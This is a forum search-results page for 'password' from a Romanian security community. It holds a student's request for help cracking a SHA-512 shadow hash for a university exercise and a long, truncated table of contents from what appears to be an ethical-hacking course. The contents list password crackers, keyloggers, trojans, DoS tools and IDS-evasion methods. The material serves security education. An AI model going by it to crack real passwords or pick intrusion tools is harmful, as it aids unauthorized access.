Jump to content

Search the Community

Showing results for tags 'password'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 47 results

  1. Salutare, imi cer scuze daca am gresit sectiunea sau e o intrebare mult prea usoara pt acest forum ( e prima mea postare ). Am primit la facultate un cod pt spart o parola shadow ( era dintr-un exemplu) iar dupa ce am testat acel exemplu, am primit un alt hash pe care sa-l spargem, insa fara niciun cod sursa. Deci mai pe scurt, poate cineva sa ma ajute sa modific acel exemplu primit pt hash-ul pe care trebuie sa-l sparg? Aici e exemplul primit de la facultate. Acum enuntul problemei de care nu-i dau de cap suna asa : " Find the password that corresponds to the following shadows entry, having in mind that the character set is {a, b, c, 1, 2, !, @, #} and the non-alphanumerical symbols occur only at the end of the password ". tom:$6$SvT3dVpN$lwb3GViLl0J0ntNk5BAWe2WtkbjSBMXtSkDCtZUkVhVPiz5 X37WflWL4k3ZUusdoyh7IOUlSXE1jUHxIrg29p.:16471:0:99999:7::: (asta e hash-ul pe care trebuie sa-l sparg) Ma poate ajuta cineva sa sparg acest shadow, utilizand exemplul de mai sus ? Multumesc frumos!
  2. o Sensepost Footprint Tools o Big Brother o BiLE Suite o Alchemy Network Tool o Advanced Administrative Tool o My IP Suite o Wikto Footprinting Tool o Whois Lookup o Whois o SmartWhois o ActiveWhois o LanWhois o CountryWhois o WhereIsIP o Ip2country o CallerIP o Web Data Extractor Tool o Online Whois Tools o What is MyIP o DNS Enumerator o SpiderFoot o Nslookup o Extract DNS Information • Types of DNS Records • Necrosoft Advanced DIG o Expired Domains o DomainKing o Domain Name Analyzer o DomainInspect o MSR Strider URL Tracer o Mozzle Domain Name Pro o Domain Research Tool (DRT) o Domain Status Reporter o Reggie o Locate the Network Range • ARIN • Traceroute • 3D Traceroute • NeoTrace • VisualRoute Trace • Path Analyzer Pro • Maltego • Layer Four Traceroute • Prefi x WhoIs widget • Touchgraph • VisualRoute Mail Tracker • eMailTrackerPro o 1st E-mail Address Spider o Power E-mail Collector Tool o GEOSpider o Geowhere Footprinting Tool o Google Earth o Kartoo Search Engine o Dogpile (Meta Search Engine) o Tool: WebFerret o robots.txt o WTR - Web The Ripper o Website Watcher SCANNING • Angry IP • HPing2 • Ping Sweep • Firewalk Tool • Firewalk Commands • Firewalk Output • Nmap • Nmap: Scan Methods • NMAP Scan Options • NMAP Output Format • TCP Communication Flags • Three Way Handshake o Syn Stealth/Half Open Scan o Stealth Scan o Xmas Scan o Fin Scan o Null Scan o Idle Scan o ICMP Echo Scanning/List Scan o TCP Connect/Full Open Scan o FTP Bounce Scan • Ftp Bounce Attack o SYN/FIN Scanning Using IP Fragments o UDP Scanning o Reverse Ident Scanning o RPC Scan o Window Scan o Blaster Scan o Portscan Plus, Strobe o IPSec Scan o Netscan Tools Pro o WUPS – UDP Scanner o Superscan o IPScanner o Global Network Inventory Scanner o Net Tools Suite Pack o Atelier Web Ports Traffi c Analyzer (AWPTA) o Atelier Web Security Port Scanner (AWSPS) o IPEye o ike-scan o Infi ltrator Network Security Scanner o YAPS: Yet Another Port Scanner o Advanced Port Scanner o NetworkActiv Scanner o NetGadgets o P-Ping Tools o MegaPing o LanSpy o HoverIP o LANView o NetBruteScanner o SolarWinds Engineer’s Toolset o AUTAPF o OstroSoft Internet Tools o Advanced IP Scanner o Active Network Monitor o Advanced Serial Data Logger o Advanced Serial Port Monitor o WotWeb o Antiy Ports o Port Detective Enumeration Overview of System Hacking Cycle Techniques for Enumeration NetBIOS Null Sessions o So What’s the Big Deal o DumpSec Tool o NetBIOS Enumeration Using Netview • Nbtstat Enumeration Tool • SuperScan • Enum Tool o Enumerating User Accounts • GetAcct o Null Session Countermeasure PS Tools o PsExec o PsFile o PsGetSid o PsKill o PsInfo o PsList o PsLogged On o PsLogList o PsPasswd o PsService o PsShutdown o PsSuspend o Management Information Base (MIB) o SNMPutil Example o SolarWinds o SNScan o Getif SNMP MIB Browser o UNIX Enumeration o SNMP UNIX Enumeration o SNMP Enumeration Countermeasures o LDAP enumeration o JXplorer o LdapMiner o Softerra LDAP Browser o NTP enumeration o SMTP enumeration o Smtpscan o Web enumeration o Asnumber o Lynx o Windows Active Directory Attack Tool o How To Enumerate Web Application Directories in IIS Using DirectoryServices IP Tools Scanner Enumerate Systems Using Default Password Tools: o NBTScan o NetViewX o FREENETENUMERATOR o Terminal Service Agent o TXNDS o Unicornscan o Amap o Netenum System Hacking Part 1- Cracking Password o Password Types o Types of Password Attack • Passive Online Attack: Wire Sniffi ng • Passive Online Attack: Man-in-the-middle and replay attacks • Active Online Attack: Password Guessing • Offl ine Attacks Brute force Attack Pre-computed Hashes Syllable Attack/Rule-based Attack/ Hybrid attacks Distributed network Attack Rainbow Attack • Non-Technical Attacks o PDF Password Cracker o Abcom PDF Password Cracker o Password Mitigation o Permanent Account Lockout-Employee Privilege Abuse o Administrator Password Guessing • Manual Password cracking Algorithm • Automatic Password Cracking Algorithm o Performing Automated Password Guessing • Tool: NAT • Smbbf (SMB Passive Brute Force Tool) • SmbCrack Tool: Legion • Hacking Tool: LOphtcrack o Microsoft Authentication • LM, NTLMv1, and NTLMv2 • NTLM And LM Authentication On The Wire • Kerberos Authentication • What is LAN Manager Hash? LM “Hash” Generation LM Hash • Salting • PWdump2 and Pwdump3 • Tool: Rainbowcrack • Hacking Tool: KerbCrack • Hacking Tool: NBTDeputy • NetBIOS DoS Attack • Hacking Tool: John the Ripper o Password Sniffi ng o How to Sniff SMB Credentials? o SMB Replay Attacks o Replay Attack Tool: SMBProxy o SMB Signing o Tool: LCP o Tool: SID&User o Tool: Ophcrack 2 o Tool: Crack o Tool: Access PassView o Tool: Asterisk Logger o Tool: CHAOS Generator o Tool: Asterisk Key o Password Recovery Tool: MS Access Database Password Decoder o Password Cracking Countermeasures o Do Not Store LAN Manager Hash in SAM Database o LM Hash Backward Compatibility o How to Disable LM HASH o Password Brute-Force Estimate Tool o Syskey Utility o AccountAudit Part2-Escalating Privileges o Privilege Escalation o Cracking NT/2000 passwords o Active@ Password Changer • Change Recovery Console Password - Method 1 • Change Recovery Console Password - Method 2 o Privilege Escalation Tool: x.exe Part3-Executing applications o Tool: psexec o Tool: remoexec o Ras N Map o Tool: Alchemy Remote Executor o Emsa FlexInfo Pro o Keystroke Loggers o E-mail Keylogger o Revealer Keylogger Pro o Handy Keylogger o Ardamax Keylogger o Powered Keylogger o Quick Keylogger o Spy-Keylogger o Perfect Keylogger o Invisible Keylogger o Actual Spy o SpyToctor FTP Keylogger o IKS Software Keylogger o Ghost Keylogger o Hacking Tool: Hardware Key Logger o What is Spyware? o Spyware: Spector o Remote Spy o Spy Tech Spy Agent o 007 Spy Software o Spy Buddy o Ace Spy o Keystroke Spy o Activity Monitor o Hacking Tool: eBlaster o Stealth Voice Recorder o Stealth Keylogger o Stealth Website Logger o Digi Watcher Video Surveillance o Desktop Spy Screen Capture Program o Telephone Spy o Print Monitor Spy Tool o Stealth E-Mail Redirector o Spy Software: Wiretap Professional o Spy Software: FlexiSpy o PC PhoneHome o Keylogger Countermeasures o Anti Keylogger Trojans and Backdoors Effect on Business What is a Trojan? o Overt and Covert Channels o Working of Trojans o Different Types of Trojans Remote Access Trojans Data-Sending Trojans Destructive Trojans Denial-of-Service (DoS) Attack Trojans Proxy Trojans FTP Trojans Security Software Disablers o What do Trojan Creators Look for? o Different Ways a Trojan can Get into a System Indications of a Trojan Attack Ports Used by Trojans o How to Determine which Ports are Listening Trojans o Trojan: iCmd o MoSucker Trojan o Proxy Server Trojan o SARS Trojan Notifi cation o Wrappers o Wrapper Covert Program o Wrapping Tools o One Exe Maker / YAB / Pretator Wrappers o Packaging Tool: WordPad o RemoteByMail o Tool: Icon Plus o Defacing Application: Restorator o Tetris o HTTP Trojans o Trojan Attack through Http o HTTP Trojan (HTTP RAT) o Shttpd Trojan - HTTP Server o Reverse Connecting Trojans o Nuclear RAT Trojan (Reverse Connecting) o Tool: BadLuck Destructive Trojan o ICMP Tunneling o ICMP Backdoor Trojan o Microsoft Network Hacked by QAZ Trojan o Backdoor.Theef (AVP) o T2W (TrojanToWorm) o Biorante RAT o DownTroj o Turkojan o Trojan.Satellite-RAT o Yakoza o DarkLabel B4 o Trojan.Hav-Rat o Poison Ivy o Rapid Hacker o SharK o HackerzRat o TYO o 1337 Fun Trojan o Criminal Rat Beta o VicSpy o Optix PRO o ProAgent o OD Client o AceRat o Mhacker-PS o RubyRAT Public o SINner o ConsoleDevil o ZombieRat o FTP Trojan - TinyFTPD o VNC Trojan o Webcam Trojan o DJI RAT o Skiddie Rat o Biohazard RAT o Troya o ProRat o Dark Girl o DaCryptic o Net-Devil Classic Trojans Found in the Wild o Trojan: Tini o Trojan: NetBus o Trojan: Netcat o Netcat Client/Server o Netcat Commands o Trojan: Beast o Trojan: Phatbot o Trojan: Amitis o Trojan: Senna Spy o Trojan: QAZ o Trojan: Back Orifi ce o Trojan: Back Oriffi ce 2000 o Back Oriffi ce Plug-ins o Trojan: SubSeven o Trojan: CyberSpy Telnet Trojan o Trojan: Subroot Telnet Trojan o Trojan: Let Me Rule! 2.0 BETA 9 o Trojan: Donald Dick o Trojan: RECUB Hacking Tool: Loki Loki Countermeasures Atelier Web Remote Commander Trojan Horse Construction Kit How to Detect Trojans? o Netstat o fPort o TCPView Viruses and Worms Virus History Characteristics of Virus Working of Virus o Infection Phase o Attack Phase Why people create Computer Viruses Symptoms of a Virus-like Attack Virus Hoaxes Chain Letters How is a Worm Different from a Virus Indications of a Virus Attack Hardware Threats Software Threats Virus Damage Mode of Virus Infection Stages of Virus Life Virus Classifi cation How Does a Virus Infect? Storage Patterns of Virus o System Sector virus o Stealth Virus o Bootable CD-Rom Virus • Self -Modifi cation • Encryption with a Variable Key o Polymorphic Code o Metamorphic Virus o Cavity Virus o Sparse Infector Virus o Companion Virus o File Extension Virus Famous Virus/Worms – I Love You Virus Famous Virus/Worms – Melissa Famous Virus/Worms – JS/Spth Klez Virus Analysis Latest Viruses Top 10 Viruses- 2008 o Virus: Win32.AutoRun.ah o Virus:W32/Virut o Virus:W32/Divvi o Worm.SymbOS.Lasco.a o Disk Killer o Bad Boy o HappyBox o Java.StrangeBrew o MonteCarlo Family o PHP.Neworld o W32/WBoy.a o ExeBug.d o W32/Voterai.worm.e o W32/Lecivio.worm o W32/Lurka.a o W32/Vora.worm!p2p Writing a Simple Virus Program Virus Construction Kits Virus Detection Methods Virus Incident Response What is Sheep Dip? Virus Analysis – IDA Pro Tool Prevention is better than Cure Anti-Virus Software o AVG Antivirus o Norton Antivirus o McAfee o Socketsheild o BitDefender o ESET Nod32 o CA Anti-Virus o F-Secure Anti-Virus o Kaspersky Anti-Virus o F-Prot Antivirus o Panda Antivirus Platinum o avast! Virus Cleaner o ClamWin o Norman Virus Control Popular Anti-Virus Packages Virus Databases Sniffers Defi nition - Sniffi ng Protocols Vulnerable to Sniffi ng Tool: Network View – Scans the Network for Devices The Dude Sniffer Wireshark Display Filters in Wireshark Following the TCP Stream in Wireshark Cain and Abel Tcpdump Tcpdump Commands Types of Sniffi ng o Passive Sniffi ng o Active Sniffi ng What is ARP o ARP Spoofi ng Attack o How does ARP Spoofi ng Work o ARP Poising o MAC Duplicating o MAC Duplicating Attack o Tools for ARP Spoofi ng • Ettercap • ArpSpyX o MAC Flooding • Tools for MAC Flooding Linux Tool: Macof Windows Tool: Etherfl ood o Threats of ARP Poisoning o Irs-Arp Attack Tool o ARPWorks Tool o Tool: Nemesis o IP-based sniffi ng Linux Sniffi ng Tools (dsniff package) o Linux tool: Arpspoof o Linux Tool: Dnssppoof o Linux Tool: Dsniff o Linux Tool: Filesnarf o Linux Tool: Mailsnarf o Linux Tool: Msgsnarf o Linux Tool: Sshmitm o Linux Tool: Tcpkill o Linux Tool: Tcpnice o Linux Tool: Urlsnarf o Linux Tool: Webspy o Linux Tool: Webmitm DNS Poisoning Techniques o Intranet DNS Spoofi ng (Local Network) o Internet DNS Spoofi ng (Remote Network) o Proxy Server DNS Poisoning o DNS Cache Poisoning Interactive TCP Relay Interactive Replay Attacks Raw Sniffi ng Tools Features of Raw Sniffi ng Tools o HTTP Sniffer: EffeTech o Ace Password Sniffer o Win Sniffer o MSN Sniffer o SmartSniff o Session Capture Sniffer: NetWitness o Session Capture Sniffer: NWreader o Packet Crafter Craft Custom TCP/IP Packets o SMAC o NetSetMan Tool o Ntop o EtherApe o Network Probe o Maa Tec Network Analyzer o Tool: Snort o Tool: Windump o Tool: Etherpeek o NetIntercept o Colasoft EtherLook o AW Ports Traffi c Analyzer o Colasoft Capsa Network Analyzer o CommView o Sniffem o NetResident o IP Sniffer o Sniphere o IE HTTP Analyzer o BillSniff o URL Snooper o EtherDetect Packet Sniffer o EffeTech HTTP Sniffer o AnalogX Packetmon o Colasoft MSN Monitor o IPgrab o EtherScan Analyzer Social Engineering What is Social Engineering? Human Weakness “Rebecca” and “Jessica” Offi ce Workers Types of Social Engineering o Human-Based Social Engineering • Technical Support Example • More Social Engineering Examples • Human-Based Social Engineering: Eavesdropping • Human-Based Social Engineering: Shoulder Surfi ng • Human-Based Social Engineering: Dumpster Diving • Dumpster Diving Example • Oracle Snoops Microsoft’s Trash Bins • Movies to Watch for Reverse Engineering o Computer Based Social Engineering o Insider Attack o Disgruntled Employee o Preventing Insider Threat o Common Targets of Social Engineering Social Engineering Threats o Online o Telephone o Personal approaches o Defenses Against Social Engineering Threats Factors that make Companies Vulnerable to Attacks Why is Social Engineering Effective Warning Signs of an Attack Tool : Netcraft Anti-Phishing Toolbar Phases in a Social Engineering Attack Behaviors Vulnerable to Attacks Impact on the Organization Countermeasures Policies and Procedures Security Policies - Checklist Denial-of-Service Real World Scenario of DoS Attacks What are Denial-of-Service Attacks Goal of DoS Impact and the Modes of Attack Types of Attacks DoS Attack Classifi cation o Smurf Attack o Buffer Overfl ow Attack o Ping of Death Attack o Teardrop Attack o SYN Attack o SYN Flooding o DoS Attack Tools o DoS Tool: Jolt2 o DoS Tool: Bubonic.c o DoS Tool: Land and LaTierra o DoS Tool: Targa o DoS Tool: Blast o DoS Tool: Nemesy o DoS Tool: Panther2 o DoS Tool: Crazy Pinger o DoS Tool: SomeTrouble o DoS Tool: UDP Flood o DoS Tool: FSMax Bot (Derived from the Word RoBOT) Botnets Uses of Botnets How Do They Infect? Analysis Of Agabot How Do They Infect Tool: Nuclear Bot What is DDoS Attack Characteristics of DDoS Attacks DDOS Unstoppable Agent Handler Model DDoS IRC based Model DDoS Attack Taxonomy Amplifi cation Attack Refl ective DNS Attacks Refl ective DNS Attacks Tool: ihateperl.pl DDoS Tools o DDoS Tool: Trinoo o DDoS Tool: Tribal Flood Network o DDoS Tool: TFN2K o DDoS Tool: Stacheldraht o DDoS Tool: Shaft o DDoS Tool: Trinity o DDoS Tool: Knight and Kaiten o DDoS Tool: Mstream Worms Slammer Worm Spread of Slammer Worm – 30 min MyDoom.B SCO Against MyDoom Worm How to Conduct a DDoS Attack The Refl ected DoS Attacks Refl ection of the Exploit Countermeasures for Refl ected DoS DDoS Countermeasures Taxonomy of DDoS Countermeasures Preventing Secondary Victims Detect and Neutralize Handlers Detect Potential Attacks Session Hijacking What is Session Hijacking? Spoofi ng v Hijacking Steps in Session Hijacking Types of Session Hijacking Session Hijacking Levels Network Level Hijacking The 3-Way Handshake TCP Concepts 3-Way Handshake Sequence Numbers Sequence Number Prediction TCP/IP hijacking IP Spoofi ng: Source Routed Packets RST Hijacking o RST Hijacking Tool: hijack_rst.sh Blind Hijacking Man in the Middle: Packet Sniffer UDP Hijacking Application Level Hijacking Programs that Performs Session Hacking o Juggernaut o Hunt o TTY-Watcher o IP watcher o Session Hijacking Tool: T-Sight o Remote TCP Session Reset Utility (SOLARWINDS) o Paros HTTP Session Hijacking Tool o Dnshijacker Tool o Hjksuite Tool Dangers that hijacking Pose Protecting against Session Hijacking Countermeasures: IPSec Hacking Web Servers How Web Servers Work How are Web Servers Compromised Web Server Defacement o How are Servers Defaced Apache Vulnerability Attacks against IIS o IIS Components o IIS Directory Traversal (Unicode) Attack Unicode o Unicode Directory Traversal Vulnerability Hacking Tool o Hacking Tool: IISxploit.exe o Msw3prt IPP Vulnerability o RPC DCOM Vulnerability o ASP Trojan o Network Tool: Log Analyzer o Hacking Tool: CleanIISLog o ServerMask ip100 o Tool: CacheRight o Tool: CustomError o Tool: HttpZip o Tool: LinkDeny o Tool: ServerDefender AI o Tool: ZipEnable o Tool: w3compiler o Yersinia Tool: MPack Tool: Neosploit Hotfi xes and Patches What is Patch Management Patch Management Checklist o Solution: UpdateExpert o Patch Management Tool: qfecheck o Patch Management Tool: HFNetChk o cacls.exe utility o Shavlik NetChk Protect o Kaseya Patch Management o IBM Tivoli Confi guration Manager o LANDesk Patch Manager o BMC Patch Manager o Confi gureSoft Enterprise Confi guration Manager (ECM) o BladeLogic Confi guration Manager o Opsware Server Automation System (SAS) o Best Practices for Patch Management Vulnerability Scanners Online Vulnerability Search Engine Network Tool: Whisker Network Tool: N-Stealth HTTP Vulnerability Scanner Hacking Tool: WebInspect Network Tool: Shadow Security Scanner Secure IIS o ServersCheck Monitoring o GFI Network Server Monitor o Servers Alive o Webserver Stress Tool Web-Based Password Cracking Techniques Authentication - Defi nition Authentication Mechanisms o HTTP Authentication • Basic Authentication • Digest Authentication o Integrated Windows (NTLM) Authentication o Negotiate Authentication o Certifi cate-based Authentication o Forms-based Authentication o RSA SecurID Token o Biometrics Authentication • Types of Biometrics Authentication Fingerprint-based Identifi cation Hand Geometry- based Identifi cation Retina Scanning Face Recognition Face Code: WebCam Based Biometrics Authentication System Bill Gates at the RSA Conference 2006 How to Select a Good Password Things to Avoid in Passwords Changing Your Password Protecting Your Password Examples of Bad Passwords The “Mary Had A Little Lamb” Formula How Hackers Get Hold of Passwords Windows XP: Remove Saved Passwords What is a Password Cracker Modus Operandi of an Attacker Using a Password Cracker How Does a Password Cracker Work Attacks - Classifi cation o Password Guessing o Query String o Cookies o Dictionary Maker Password Crackers Available o L0phtCrack (LC4) o John the Ripper o Brutus o ObiWaN o Authforce o Hydra o Cain & Abel o RAR o Gammaprog o WebCracker o Munga Bunga o PassList o SnadBoy o MessenPass o Wireless WEP Key Password Spy o RockXP o Password Spectator Pro o Passwordstate o Atomic Mailbox Password Cracker o Advanced Mailbox Password Recovery (AMBPR) o Tool: Network Password Recovery o Tool: Mail PassView o Tool: Messenger Key o Tool: SniffPass o WebPassword o Password Administrator o Password Safe o Easy Web Password o PassReminder o My Password Manager SQL Injection What is SQL Injection Exploiting Web Applications Steps for performing SQL injection What You Should Look For What If It Doesn’t Take Input OLE DB Errors Input Validation Attack SQL injection Techniques How to Test for SQL Injection Vulnerability How Does It Work BadLogin.aspx.cs BadProductList.aspx.cs Executing Operating System Commands Getting Output of SQL Query Getting Data from the Database Using ODBC Error Message How to Mine all Column Names of a Table How to Retrieve any Data How to Update/Insert Data into Database SQL Injection in Oracle SQL Injection in MySql Database Attacking Against SQL Servers SQL Server Resolution Service (SSRS) Osql -L Probing SQL Injection Automated Tools Automated SQL Injection Tool: AutoMagic SQL Absinthe Automated SQL Injection Tool o Hacking Tool: SQLDict o Hacking Tool: SQLExec o SQL Server Password Auditing Tool: sqlbf o Hacking Tool: SQLSmack o Hacking Tool: SQL2.exe o sqlmap o sqlninja o SQLIer o Automagic SQL Injector Blind SQL Injection o Blind SQL Injection: Countermeasure o Blind SQL Injection Schema SQL Injection Countermeasures Preventing SQL Injection Attacks GoodLogin.aspx.cs SQL Injection Blocking Tool: SQL Block Acunetix Web Vulnerability Scanner Hacking Wireless Networks Introduction to Wireless o Introduction to Wireless Networking o Wired Network vs. Wireless Network o Effects of Wireless Attacks on Business o Types of Wireless Network o Advantages and Disadvantages of a Wireless Network Wireless Standards o Wireless Standard: 802.11a o Wireless Standard: 802.11b – “WiFi” o Wireless Standard: 802.11g o Wireless Standard: 802.11i o Wireless Standard: 802.11n Wireless Concepts and Devices o Related Technology and Carrier Networks o Antennas o Wireless Access Points o SSID o Beacon Frames o Is the SSID a Secret o Setting up a WLAN o Authentication and Association o Authentication Modes o The 802.1X Authentication Process WEP and WPA o Wired Equivalent Privacy (WEP) o WEP Issues o WEP - Authentication Phase o WEP - Shared Key Authentication o WEP - Association Phase o WEP Flaws o What is WPA o WPA Vulnerabilities o WEP, WPA, and WPA2 o WPA2 Wi-Fi Protected Access 2 Attacks and Hacking Tools o Terminologies o WarChalking o Authentication and (Dis) Association Attacks o WEP Attack o Cracking WEP o Weak Keys (a.k.a. Weak IVs) o Problems with WEP’s Key Stream and Reuse o Automated WEP Crackers o Pad-Collection Attacks o XOR Encryption o Stream Cipher o WEP Tool: Aircrack o Aircrack-ng o WEP Tool: AirSnort o WEP Tool: WEPCrack o WEP Tool: WepLab o Attacking WPA Encrypted Networks o Attacking WEP with WEPCrack on Windows using Cygwin o Attacking WEP with WEPCrack on Windows using PERL Interpreter o Tool: Wepdecrypt o WPA-PSK Cracking Tool: CowPatty o 802.11 Specifi c Vulnerabilities o Evil Twin: Attack o Rogue Access Points o Tools to Generate Rogue Access Points: Fake AP o Tools to Detect Rogue Access Points: Netstumbler o Tools to Detect Rogue Access Points: MiniStumbler o ClassicStumbler o AirFart o AP Radar o Hotspotter o Cloaked Access Point o WarDriving Tool: shtumble o Temporal Key Integrity Protocol (TKIP) o LEAP: The Lightweight Extensible Authentication Protocol o LEAP Attacks o LEAP Attack Tool: ASLEAP o Working of ASLEAP o MAC Sniffi ng and AP Spoofi ng o Defeating MAC Address Filtering in Windows o Manually Changing the MAC Address in Windows XP and 2000 o Tool to Detect MAC Address Spoofi ng: Wellenreiter o Man-in-the-Middle Attack (MITM) o Denial-of-Service Attacks o DoS Attack Tool: Fatajack o Hijacking and Modifying a Wireless Network o Phone Jammers o Phone Jammer: Mobile Blocker o Pocket Cellular Style Cell Phone Jammer o 2.4Ghz Wi-Fi & Wireless Camera Jammer o 3 Watt Digital Cell Phone Jammer o 3 Watt Quad Band Digital Cellular Mobile Phone Jammer o 20W Quad Band Digital Cellular Mobile Phone Jammer o 40W Digital Cellular Mobile Phone Jammer o Detecting a Wireless Network Scanning Tools o Scanning Tool: Kismet o Scanning Tool: Prismstumbler o Scanning Tool: MacStumbler o Scanning Tool: Mognet V1.16 o Scanning Tool: WaveStumbler o Scanning Tool: Netchaser V1.0 for Palm Tops o Scanning Tool: AP Scanner o Scanning Tool: Wavemon o Scanning Tool: Wireless Security Auditor (WSA) o Scanning Tool: AirTraf o Scanning Tool: WiFi Finder o Scanning Tool: Wifi Scanner o eEye Retina WiFI o Simple Wireless Scanner o wlanScanner Sniffi ng Tools o Sniffi ng Tool: AiroPeek o Sniffi ng Tool: NAI Wireless Sniffer o MAC Sniffi ng Tool: WireShark o Sniffi ng Tool: vxSniffer o Sniffi ng Tool: Etherpeg o Sniffi ng Tool: Drifnet o Sniffi ng Tool: AirMagnet o Sniffi ng Tool: WinDump o Sniffi ng Tool: Ssidsniff o Multiuse Tool: THC-RUT o Tool: WinPcap o Tool: AirPcap o AirPcap: Example Program from the Developer’s Pack Hacking Wireless Networks o Steps for Hacking Wireless Networks o Step 1: Find Networks to Attack o Step 2: Choose the Network to Attack o Step 3: Analyzing the Network o Step 4: Cracking the WEP Key o Step 5: Sniffi ng the Network Wireless Security o WIDZ: Wireless Intrusion Detection System o Radius: Used as Additional Layer in Security o Securing Wireless Networks o Wireless Network Security Checklist o WLAN Security: Passphrase o Don’ts in Wireless Security Wireless Security Tools o WLAN Diagnostic Tool: CommView for WiFi PPC o WLAN Diagnostic Tool: AirMagnet Handheld Analyzer Linux Hacking Why Linux Linux Distributions Linux Live CD-ROMs Basic Commands of Linux: Files & Directories Linux Basic o Linux File Structure o Linux Networking Commands Directories in Linux Installing, Confi guring, and Compiling Linux Kernel How to Install a Kernel Patch Compiling Programs in Linux GCC Commands Make Files Make Install Command Linux Vulnerabilities Chrooting Why is Linux Hacked How to Apply Patches to Vulnerable Programs Scanning Networks Nmap in Linux Scanning Tool: Nessus Port Scan Detection Tools Password Cracking in Linux: Xcrack Firewall in Linux: IPTables IPTables Command Basic Linux Operating System Defense SARA (Security Auditor's Research Assistant) Linux Tool: Netcat Linux Tool: tcpdump Linux Tool: Snort Linux Tool: SAINT Linux Tool: Wireshark Linux Tool: Abacus Port Sentry Linux Tool: DSniff Collection Linux Tool: Hping2 Linux Tool: Sniffi t Linux Tool: Nemesis Linux Tool: LSOF Linux Tool: IPTraf Linux Tool: LIDS Hacking Tool: Hunt Tool: TCP Wrappers Linux Loadable Kernel Modules Hacking Tool: Linux Rootkits Rootkits: Knark & Torn Rootkits: Tuxit, Adore, Ramen Rootkit: Beastkit Rootkit Countermeasures ‘chkrootkit’ detects the following Rootkits Evading IDS, Firewalls and Detecting Honey Pots Introduction to Intrusion Detection System Terminologies Intrusion Detection System (IDS) o IDS Placement o Ways to Detect an Intrusion o Types of Instruction Detection Systems o System Integrity Verifi ers (SIVS) o Tripwire o Cisco Security Agent (CSA) o True/False, Positive/Negative o Signature Analysis o General Indication of Intrusion: System Indications o General Indication of Intrusion: File System Indications o General Indication of Intrusion: Network Indications o Intrusion Detection Tools • Snort • Running Snort on Windows 2003 • Snort Console • Testing Snort • Confi guring Snort (snort.conf ) • Snort Rules • Set up Snort to Log to the Event Logs and to Run as a Service • Using EventTriggers.exe for Eventlog Notifi cations • SnortSam o Steps to Perform after an IDS detects an attack o Evading IDS Systems • Ways to Evade IDS • Tools to Evade IDS IDS Evading Tool: ADMutate Packet Generators What is a Firewall? o What Does a Firewall Do o Packet Filtering o What can’t a fi rewall do o How does a Firewall work o Firewall Operations o Hardware Firewall o Software Firewall o Types of Firewall • Packet Filtering Firewall • IP Packet Filtering Firewall • Circuit-Level Gateway • TCP Packet Filtering Firewall • Application Level Firewall • Application Packet Filtering Firewall • Stateful Multilayer Inspection Firewall o Packet Filtering Firewall o Firewall Identifi cation o Firewalking o Banner Grabbing o Breaching Firewalls o Bypassing a Firewall using HTTPTunnel o Placing Backdoors through Firewalls o Hiding Behind a Covert Channel: LOKI o Tool: NCovert o ACK Tunneling Common Tool for Testing Firewall and IDS o IDS testing tool: IDS Informer o IDS Testing Tool: Evasion Gateway o IDS Tool: Event Monitoring Enabling Responses to Anomalous Live Disturbances (Emerald) o IDS Tool: BlackICE o IDS Tool: Next-Generation Intrusion Detection Expert System (NIDES) o IDS Tool: SecureHost o IDS Tool: Snare o IDS Testing Tool: Traffi c IQ Professional o IDS Testing Tool: TCPOpera o IDS testing tool: Firewall Informer o Atelier Web Firewall Tester What is Honeypot? o The Honeynet Project o Types of Honeypots Low-interaction honeypot Medium-interaction honeypot High-interaction honeypot o Advantages and Disadvantages of a Honeypot o Where to place Honeypots o Honeypots • Honeypot-SPECTER • Honeypot - honeyd • Honeypot – KFSensor • Sebek o Physical and Virtual Honeypots Tools to Detect Honeypots What to do when hacked Buffer Overflows Why are Programs/Applications Vulnerable Buffer Overfl ows Reasons for Buffer Overfl ow Attacks Knowledge Required to Program Buffer Overfl ow Exploits Understanding Stacks Understanding Heaps Types of Buffer Overfl ows: Stack-based Buffer Overfl ow o A Simple Uncontrolled Overfl ow of the Stack o Stack Based Buffer Overfl ows Types of Buffer Overfl ows: Heap-based Buffer Overfl ow o Heap Memory Buffer Overfl ow Bug o Heap-based Buffer Overfl ow Understanding Assembly Language o Shellcode How to Detect Buffer Overfl ows in a Program o Attacking a Real Program NOPs How to Mutate a Buffer Overfl ow Exploit Once the Stack is Smashed Defense Against Buffer Overfl ows o Tool to Defend Buffer Overfl ow: Return Address Defender (RAD) o Tool to Defend Buffer Overfl ow: StackGuard o Tool to Defend Buffer Overfl ow: Immunix System o Vulnerability Search: NIST o Valgrind o Insure++ Buffer Overfl ow Protection Solution: Libsafe o Comparing Functions of libc and Libsafe Simple Buffer Overfl ow in C o Code Analysis Cryptography Introduction to Cryptography Classical Cryptographic Techniques o Encryption o Decryption Cryptographic Algorithms RSA (Rivest Shamir Adleman) o Example of RSA Algorithm o RSA Attacks o RSA Challenge Data Encryption Standard (DES) o DES Overview RC4, RC5, RC6, Blowfi sh o RC5 Message Digest Functions o One-way Bash Functions o MD5 SHA (Secure Hash Algorithm) SSL (Secure Sockets Layer) What is SSH? o SSH (Secure Shell) Algorithms and Security Disk Encryption Government Access to Keys (GAK) Digital Signature o Components of a Digital Signature o Method of Digital Signature Technology o Digital Signature Applications o Digital Signature Standard o Digital Signature Algorithm: Signature Generation/Verifi cation o Digital Signature Algorithms: ECDSA, 